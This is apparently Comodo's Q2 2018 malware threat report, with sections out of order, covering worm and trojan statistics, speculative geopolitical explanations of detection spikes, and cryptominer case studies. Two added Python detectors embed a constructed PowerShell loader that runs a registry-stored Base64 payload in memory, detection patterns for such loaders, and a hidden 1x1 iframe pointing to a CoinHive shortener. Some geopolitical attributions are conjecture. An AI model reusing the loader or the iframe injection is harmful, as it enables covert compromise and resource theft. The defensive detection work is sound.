A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network-facing software as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, drain network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing the planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them over a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms mail copies of themselves to the victim's contacts and often combine that with other vectors, such as exploits and autorun functionality, to travel between victim computers.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects .exe and .scr files and may use the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant-messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was DarkComet (also written Dark Komet), a remote access trojan (RAT) that is a full 10 years old. This malware allows a hacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology because their malicious functionality is hidden within seemingly useful or benign programs. Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the top country for Trojans according to Comodo's detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
Detections of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo targeted a favorite hacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents in a common form independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructors
Constructors are applications that can be used to create malware files automatically.
For Q2, Alamar was the top constructor that Comodo detected. Microsoft describes this program as a "severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2 but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing or "packing" it within larger, seemingly innocuous software or data streams. The hostile code can even come in the form of scripts. The compressed data usually carries separate decompression code, or even a self-extracting archive, that recreates the original code from the compressed form and then executes the malware. Encryption may also be used to conceal the malware from security software as a further means of obfuscating the attack.
MUPX, or the modified "Ultimate Packer for Executables", dominated this part of the malware landscape. UPX itself is free, open-source software that is compatible with numerous file formats and operating systems and uses an open-source data compression library, UCL, whose decompressor is only a few hundred bytes of code.
In Q2 2018 Russia was the top home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooders
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country in which Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only as a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, adds drivers, injects into processes, alters browser behavior and modifies DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming in that users often install these applications inadvertently in the course of everyday computer and Internet activity. They include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's home page, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis. In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not just in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. One caveat when reading the vertical statistics: "Kryptik" is also a generic detection name that several antivirus engines apply to heavily packed or obfuscated samples, so detections under that name can cover a range of unrelated payloads.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social-engineering scheme that falsely claims the target's computer is already infected and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Further, strategic analysis like this can be used to create a unique malware profile for each vertical, providing cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence

7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened on that day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, comprising many requests for information about upcoming changes in US political, military and intelligence activities, which they immediately set out to fulfil through computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the information that forms the basis of intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was briefly more connected to the Internet than usual, or was trying to take advantage of a short period of political openness to connect better with the outside world. Comodo researched the detected malware further and identified it as Windows activation ("cracking") software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware, because all activities, from social life to business, politics and national security, are now conducted mostly online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a day after the Russian government called a Croatian decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity revealed that it took place almost exclusively in Vantaa, the city adjoining Helsinki that hosts its international airport, precisely where the summit was scheduled to take place.
8 Conclusions. In Q2 Comodo Cybersecurity observed several significant new trends likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The increase in trojan malware last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact to be revealed in quarters to come. Trojans also serve as a delivery vector for other types of malware. Together, these facts point to a surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell for attacks are clear evidence of this rise in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from compromising those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals are increasingly hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably to revamp their security strategies, policies and postures.
REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved, Comodo Security Solutions, Inc. Visit comodo.com

North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
3 Cryptominer Evolution: Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining dangerous new abilities.

Earlier cryptominers could only use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: cryptominers did not steal information or destroy data like other malware, they merely consumed CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than those required merely to mine cryptocurrency. These samples show that cryptominers are transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide from and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash the user's system if an attempt is made to delete the malware.
3.1 BadShell attacks enterprises. Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. Fileless malware is different: as its name suggests, it consists of malicious code injected into legitimate OS processes. It need not be installed as a file on the victim machine but runs only in memory, making it much harder for antivirus products to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. Because many antivirus tools cannot detect it, users remain unaware of being infected, and, not surprisingly, its use by cybercriminals is on the increase.

Last quarter Comodo Threat Research Labs analysts faced just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts found that the malware was a cryptominer that used legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.

Decoding the PowerShell arguments reveals the malicious code stored in the registry; the PowerShell script injects that code into an existing running process. Note that "fileless" here means no standalone executable is dropped: the scheduled task and the registry value that carries the payload are both on disk, and those two artifacts are what a defender can hunt for.
BadShell at work
The malicious code in the registry
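A hunt for the persistence BadShell relies on can start from the scheduled task itself. The following Python is an added example for this report (it is not Comodo's code and not the BadShell sample): it parses a Task Scheduler XML definition, decodes a -EncodedCommand argument (Base64 of UTF-16LE text, which is how powershell.exe expects it) and flags the combination of a registry read, a Base64 payload and an in-memory load that characterizes this tradecraft. The task definition, registry path and value name in the sample are constructed for the example.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Task Scheduler stores task definitions as XML in this namespace.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed sample (not the real BadShell task): the inner script reads a Base64
# blob from a registry value and loads it in memory. Registry path and value name
# are hypothetical.
INNER_SCRIPT = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\Example' -Name 'blob').blob; "
    "$b = [Convert]::FromBase64String($p); "
    "[System.Reflection.Assembly]::Load($b) | Out-Null"
)
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {ENCODED}</Arguments>
    </Exec>
  </Actions>
</Task>"""

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Strings that, in the command line or the decoded script, point at
# registry-resident, in-memory tradecraft of the kind BadShell uses.
INDICATORS = {
    "registry-read": re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.I),
    "base64-payload": re.compile(r"FromBase64String", re.I),
    "in-memory-load": re.compile(r"Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b|VirtualAlloc", re.I),
    "hidden-window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def task_command_lines(task_xml: str):
    """Yield 'command arguments' for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    for exe in root.iter(TASK_NS + "Exec"):
        cmd = (exe.findtext(TASK_NS + "Command") or "").strip()
        args = (exe.findtext(TASK_NS + "Arguments") or "").strip()
        yield f"{cmd} {args}".strip()


def analyze_task(task_xml: str) -> list:
    """One report per action: command line, decoded script (if any), matched indicators."""
    reports = []
    for cmdline in task_command_lines(task_xml):
        decoded = decode_encoded_command(cmdline)
        haystack = cmdline if decoded is None else cmdline + "\n" + decoded
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
        # A registry payload combined with an in-memory loader is the BadShell pattern.
        suspicious = "registry-read" in hits and (
            "in-memory-load" in hits or "base64-payload" in hits
        )
        reports.append({"cmdline": cmdline, "decoded": decoded,
                        "indicators": hits, "suspicious": suspicious})
    return reports


if __name__ == "__main__":
    for report in analyze_task(SAMPLE_TASK_XML):
        print("suspicious:", report["suspicious"], report["indicators"])
        print(report["decoded"])
```

On a real host, export task definitions with `schtasks /query /xml` or read them from %SystemRoot%\System32\Tasks and pass each one to analyze_task; the registry value named in the decoded script is then the next artifact to collect, and the task is the persistence to remove.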
This incident clearly demonstrates how dangerous cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but the company's financial losses were of course irreversible.

Evading antivirus and persisting in the system are the most important attributes for a cryptominer, because the longer it runs on the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer. Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself so deeply into the system that it becomes effectively unremovable. Attempting to kill it kills the target system too.

The secret of WinstarNssmMiner's persistence lies in its method of infecting the victim's computer. It consists of two components injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially notable is that both infected svchost.exe processes carry the "critical process" attribute, meaning that terminating either of them crashes the system and leaves the user with a blue screen. This is the ProcessBreakOnTermination flag, set through NtSetInformationProcess or RtlSetProcessIsCritical; an administrator can query it with NtQueryInformationProcess before terminating a process, and the safer remediation is to remove the persistence mechanism and reboot, or to clear the flag first, rather than to kill the processes outright.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals. CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner gains undivided use of the victim's computer to mine cryptocurrency. For defenders, such lists are useful in reverse: the process names a miner goes looking for are good indicators to hunt for on endpoints.
Some cryptominers have earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example.

3.4 CoinHive changes its skin. CoinHive is a popular JavaScript cryptominer. Put its snippet of code into a web page and every visitor to the site mines coins (Monero) for you.

As you can see, the CoinHive script is easily spotted.

The CoinHive script

After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a web page

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make it as close to invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's code but doesn't find any sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
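The manual check described above can be automated. The following Python is an added example for this report (it is not Comodo's code and not the script shown in the screenshots): it decodes string literals passed to atob() or unescape() in the page source, then reports any iframe that is 1x1 or whose host is cnhv.co (the shortener shown above) or coinhive.com. The sample page and the short-link path are constructed for the example; covering both encodings goes slightly beyond the single case on the page.

```python
import base64
import re
import urllib.parse
from html.parser import HTMLParser

# Domains worth flagging: cnhv.co is the CoinHive short-link service shown in the
# report; coinhive.com hosted the miner script itself.
SHORTENER_DOMAINS = {"cnhv.co"}
MINER_DOMAINS = {"coinhive.com"}

# Two encodings used by document.write()-style loaders: a Base64 literal handed
# to atob(), and a percent-encoded literal handed to unescape().
ATOB_LITERAL = re.compile(r"""\batob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
UNESCAPE_LITERAL = re.compile(r"""\bunescape\(\s*['"]((?:%[0-9A-Fa-f]{2}|[^'"])+)['"]\s*\)""")


def decode_literals(js: str) -> list:
    """Decode every atob()/unescape() string literal found in the page source."""
    out = []
    for m in ATOB_LITERAL.finditer(js):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass  # not valid Base64, skip it
    for m in UNESCAPE_LITERAL.finditer(js):
        out.append(urllib.parse.unquote(m.group(1)))
    return out


class _IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _dimension(value) -> int:
    """'1', '1px', '0' -> int; a missing or unparsable size counts as large (not hidden)."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 10 ** 6


def scan_page(html: str) -> list:
    """Report iframes that are 1x1 or point at CoinHive infrastructure, both in the
    page as served and inside decoded atob()/unescape() literals."""
    findings = []
    layers = [("plain", html)] + [("decoded", p) for p in decode_literals(html)]
    for layer, markup in layers:
        collector = _IframeCollector()
        collector.feed(markup)
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = (urllib.parse.urlsplit(src).hostname or "").lower()
            reasons = []
            if _dimension(attrs.get("width")) <= 1 and _dimension(attrs.get("height")) <= 1:
                reasons.append("1x1 iframe")
            if host in SHORTENER_DOMAINS:
                reasons.append("coinhive shortener")
            if host in MINER_DOMAINS:
                reasons.append("miner domain")
            if reasons:
                findings.append({"layer": layer, "src": src, "reasons": reasons})
    return findings


# Constructed sample page (not the site from the report); the short-link path is invented.
_HIDDEN_IFRAME = '<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1" frameborder="0"></iframe>'
SAMPLE_PAGE = (
    "<html><body><h1>Daily news</h1>\n"
    '<script>document.write(atob("' + base64.b64encode(_HIDDEN_IFRAME.encode()).decode() + '"));</script>\n'
    "</body></html>"
)

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

The scanner only sees what is in the static source; a loader that builds the string at runtime needs the page rendered in a browser (or a proxy that logs outbound requests to the shortener) instead, which is why blocking cnhv.co and coinhive.com at the network edge is the simpler control.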
